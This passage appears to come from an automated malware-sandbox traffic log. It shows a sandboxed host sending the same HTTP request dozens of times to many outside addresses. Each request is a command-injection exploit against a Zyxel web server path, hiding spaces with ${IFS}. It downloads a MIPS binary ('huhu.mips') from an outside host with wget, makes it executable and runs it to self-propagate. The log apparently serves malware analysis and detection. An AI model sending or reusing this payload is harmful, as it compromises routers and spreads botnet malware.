                                                  Jan 19, 2024 18:23:41.753844023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  937192.168.2.1342496163.205.199.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753906012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  938192.168.2.1352698219.220.187.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753937006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  939192.168.2.1345176138.144.120.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753987074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  940192.168.2.1343754123.21.20.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754040956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  941192.168.2.1338598209.31.92.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754054070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  942192.168.2.133941875.120.6.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754097939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  943192.168.2.1338734101.238.25.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754126072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  944192.168.2.1347416162.79.156.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754157066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  945192.168.2.1337822208.69.75.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754199028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  946192.168.2.1334764192.184.88.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754255056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  947192.168.2.133480864.208.171.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754280090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  948192.168.2.1338186197.93.14.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754317045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  949192.168.2.133931612.93.230.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754364967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  950192.168.2.1333764100.147.13.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754409075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  951192.168.2.1338184109.238.35.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754455090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  952192.168.2.1336576121.104.238.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754482031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  953192.168.2.1337838163.190.13.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754511118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  954192.168.2.135875289.94.159.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754558086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  955192.168.2.1356880194.190.149.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754601002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  956192.168.2.135301444.173.110.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754642963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  957192.168.2.1352642220.50.92.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754700899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  958192.168.2.1344000186.166.178.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754733086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  959192.168.2.135113093.210.30.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754774094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  960192.168.2.1350784195.88.172.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754806042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  961192.168.2.133830852.173.236.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754921913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  962192.168.2.133862488.53.191.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754949093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  963192.168.2.1356604112.18.128.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.754996061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  964192.168.2.13340402.61.244.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755016088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  965192.168.2.1339678199.161.35.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755069017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  966192.168.2.1353630201.123.146.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755099058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  967192.168.2.1352188194.4.22.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755121946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  968192.168.2.135175678.11.94.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755146027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  969192.168.2.1350300101.34.255.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755218029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  970192.168.2.135846057.1.192.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755254030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  971192.168.2.135697047.182.121.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755311966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  972192.168.2.1347678136.203.142.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755316973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  973192.168.2.1337122191.80.237.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755362988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  974192.168.2.133721874.230.0.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755414963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  975192.168.2.1359812198.98.225.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755423069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  976192.168.2.135828413.88.131.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755527973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  977192.168.2.134605278.159.116.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755552053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  978192.168.2.1340632103.157.246.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755556107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  979192.168.2.1357176193.249.209.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755556107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  980192.168.2.133324688.147.148.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755588055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  981192.168.2.1339240181.218.27.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755595922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  982192.168.2.1355392194.67.31.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755692959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  983192.168.2.134749867.175.205.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755702972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  984192.168.2.1339428223.92.189.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755717039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  985192.168.2.1353364117.153.213.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755733013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  986192.168.2.1349726136.9.35.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755733013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  987192.168.2.1341884190.74.205.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755743980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  988192.168.2.1350190125.45.158.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755764008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  989192.168.2.1340816165.177.123.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755784988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  990192.168.2.134681423.82.103.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755834103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  991192.168.2.1348314114.187.146.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755892038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  992192.168.2.134064089.48.186.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755950928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  993192.168.2.1344578147.78.121.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.755970955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  994192.168.2.136073818.45.15.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756016970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  995192.168.2.1360370172.184.119.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756058931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  996192.168.2.133871812.140.140.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756087065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  997192.168.2.133817246.70.85.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756104946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  998192.168.2.1346776129.79.184.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.756155968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  999192.168.2.1359286165.38.237.124443
                                                  TimestampBytes transferredDirectionData
